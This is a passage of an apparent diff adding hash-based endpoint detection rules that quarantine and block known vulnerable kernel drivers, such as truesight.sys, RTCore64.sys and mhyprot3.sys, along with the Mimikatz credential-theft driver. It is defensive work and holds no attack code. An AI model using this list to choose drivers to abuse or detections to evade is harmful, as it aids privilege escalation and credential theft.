"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153736Z", + "creation_date": "2026-03-23T11:45:31.153738Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153743Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "201c02478e89e011a9a5c8f9d496ea8f10684c761ddeeaf14342cfb30c0003ca", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce69fa95-d4b1-5062-b53b-e77be033e897", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824488Z", + "creation_date": "2026-03-23T11:45:31.824491Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824499Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4a9b1b00235f0814ccef667762cdecaae9c195e9165355f73125b4bb386d7b3c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce6a0e81-1215-5d2f-a38b-7bb41d9454ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970906Z", + "creation_date": "2026-03-23T11:45:29.970909Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970917Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "463829eecbdd9c72faa3a3cab55cb52c95e93c3b79bafe855e199354432e7f76", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce6f93fb-15eb-541a-895b-eed8f215b7ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479314Z", + "creation_date": "2026-03-23T11:45:30.479316Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479322Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "16c63f5ebd96caecae3581a91b949ccc803cf7c18482448d19f9433d6d40ebee", + "comment": "Vulnerable Kernel Driver (aka VBoxTAP.sys) [https://www.loldrivers.io/drivers/f22e7230-5f32-4c4e-bc9d-9076ebf10baa/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce6fb95e-0f44-533a-a10f-3fc969feb434", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605522Z", + "creation_date": "2026-03-23T11:45:29.605524Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605529Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "32726f7b4f4c51dfe0c0de47408c6d88e8b1664ab10529f2f994bd0e1b5814e5", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) 
[https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce7924c3-5a86-573f-9dc1-55615a2df8af", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155967Z", + "creation_date": "2026-03-23T11:45:31.155969Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155974Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "925c0c27fdfbc02f3300954d6628a35479599ec1b28c6b899bf5ca12c4816097", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce79a240-6286-5ca6-9456-6637c047880c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984582Z", + "creation_date": 
"2026-03-23T11:45:29.984584Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984590Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e704bcd0526a76661be083041793be319773d2fed132e45435d800d6918532d", + "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce7bdd17-5738-5487-8217-7ea7e0015039", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461097Z", + "creation_date": "2026-03-23T11:45:30.461101Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461110Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ac8e54be2804f5fa60d0d23a11ba323fba078a942c96279425aabad935b8236", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce7fd246-ecd2-5a57-997b-9d2d32ea9a56", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610423Z", + "creation_date": "2026-03-23T11:45:29.610425Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610431Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5177a3b7393fb5855b2ec0a45d4c91660b958ee077e76e5a7d0669f2e04bcf02", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce84469e-175d-51e1-9e0d-483856c4895b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816190Z", + "creation_date": "2026-03-23T11:45:31.816193Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816201Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9c4433e84f9db7a62daa9a681ae728530602a1b1e119a5a9d13ae4366df45c71", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce856d80-4bd4-5bb1-b872-cc35a9ca1916", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475590Z", + "creation_date": "2026-03-23T11:45:30.475593Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475602Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c3fa8f5c8094a6c6936faff1d1faa02fd489482f21c288e6c700446ade5c20be", + "comment": "Vulnerable Kernel Driver (aka vboxguest.sys) [https://www.loldrivers.io/drivers/0baa833c-e4e1-449e-86ee-cafeb11f5fd5/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce879408-ac73-514b-8ec4-8f443abf91d9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486294Z", + "creation_date": "2026-03-23T11:45:31.486297Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486307Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e2985dd57d6797f48b4358ffbc5e9f9e01fa27ba9e2d609f99029b30b80e5b8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce9083f8-3e43-5a4a-b2f2-80bcc2a6c595", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817087Z", + "creation_date": "2026-03-23T11:45:30.817090Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817095Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ef438a754fd940d145cc5d658ddac666a06871d71652b258946c21efe4b7e517", + "comment": "Vulnerable Kernel Driver (aka 
AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ce9ff95b-84a7-57a6-ad14-5e8f1c3e60e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480590Z", + "creation_date": "2026-03-23T11:45:31.480594Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480604Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e25f7e8d25659647fea1d520c454f16f7aa113f0e556934e8b573c3c440ce717", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ceb3f76f-8919-5e6a-bedf-4d16a0703bcd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452157Z", + 
"creation_date": "2026-03-23T11:45:30.452160Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452169Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c3d479d7efd0f6b502d6829b893711bdd51aac07d66326b41ef5451bafdfcb29", + "comment": "Vulnerable Kernel Driver (aka mhyprot3.sys) [https://www.loldrivers.io/drivers/2aa003cd-5f36-46a6-ae3d-f5afc2c8baa3/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ceb86114-188f-5df1-b666-700dea293eb1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969576Z", + "creation_date": "2026-03-23T11:45:29.969578Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969583Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0cb639c7b27fec183ac475c91a66d91f24b500a5fa5dcabdd6920931626dfd93", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cebf7df6-3c8c-5f01-a07f-61e6154863b7", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140926Z", + "creation_date": "2026-03-23T11:45:31.140928Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140934Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1dfbf17efbf37083968567ee13ff832e0e23a27eb9244d5416e52bdae53d53a9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cec890c3-fb42-5da0-99ad-bd770dcb7e44", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148537Z", + "creation_date": "2026-03-23T11:45:31.148539Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.148545Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e849ec0c64d3d01309acf125f76c8f526aa9e5eb34cfeb85967a3a04be77ba80", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cec8ef06-547d-57fb-9ec0-b71509ed5266", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499775Z", + "creation_date": "2026-03-23T11:45:31.499779Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499787Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d099b7787a3cd78eb5ef0bcff982a8e6964cd792f96069110ef7d1101603230f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ced0ebd2-148a-586f-b79e-54d26d63b8d4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495076Z", + "creation_date": "2026-03-23T11:45:31.495078Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495086Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ccd62ae166e2ca48bdadc835e56fadc1aa3d239b408f998d60c5e19d7febe0a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ced80048-a28f-528d-9c0c-ebd741b90cf9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822899Z", + "creation_date": "2026-03-23T11:45:30.822901Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822907Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "442d506c1ac1f48f6224f0cdd64590779aee9c88bdda2f2cc3169b862cba1243", + "comment": "Vulnerable Kernel Driver (aka SBIOSIO64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ced9de67-316d-5471-a0b9-ab12b4e36070", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810344Z", + "creation_date": "2026-03-23T11:45:31.810346Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810352Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c2577d760341250044463abbf12c9bfce8556135127851a14fbe95cd404ad3a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cedd73e0-328a-52b0-8196-a9ce43909c38", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146095Z", + "creation_date": "2026-03-23T11:45:31.146097Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146103Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "37a729ead982b58a07840bf0e2cc8fcbfb2c1b446b0cd7bd1b1dd2b1ce18eda4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cede6bfa-d3fc-5a2c-a59d-5281bfb3b7d5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826595Z", + "creation_date": "2026-03-23T11:45:31.826597Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826603Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "161b2e84ee61f38f197d03d5c66bebb13d5722d4bd3e326e52ce40181b347cff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cef6c5e5-e553-5963-bcb1-7b4b49ab61c6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816454Z", + "creation_date": "2026-03-23T11:45:30.816457Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816462Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 